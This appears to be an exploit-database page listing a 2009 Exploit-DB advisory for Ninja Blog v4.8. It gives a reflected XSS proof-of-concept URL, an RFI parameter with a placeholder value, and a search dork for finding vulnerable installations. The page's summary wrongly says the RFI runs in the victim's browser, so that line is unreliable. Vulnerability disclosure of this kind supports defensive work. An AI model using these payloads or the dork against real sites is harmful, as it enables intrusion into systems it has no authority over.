header-logo
Suggest Exploit
vendor:
Ninja Blog
by:
indoushka
8,8
CVSS
HIGH
XSS and RFI
79 (XSS) and 98 (RFI)
CWE
Product Name: Ninja Blog
Affected Version From: 4.8
Affected Version To: 4.8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

Ninja Blog v4.8 Multiple Vulnerabilities

The Ninja Blog v4.8 is vulnerable to XSS and RFI attacks. An attacker can inject malicious JavaScript code into the vulnerable parameter of the index.php page, which will be executed in the browser of the victim. An attacker can also inject a malicious URL into the vulnerable parameter of the index.php page, which will be executed in the browser of the victim.

Mitigation:

Input validation should be used to prevent XSS and RFI attacks. All user-supplied input should be validated and filtered before being used in the application.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Ninja Blog v4.8 Multiple Vulnerabilities                  
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 2                                                
|                High  : 1                                                                       
|              Medium  : 1                                                                       
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
| # Dork     : Powered by Ninja Designs This is a port of WordPress                                    
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Multi                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS

http://server/ninjablog4.8/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

 2- RFI
 
 http://server/ninjablog4.8/entries/index.php?page=[EV!L]

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR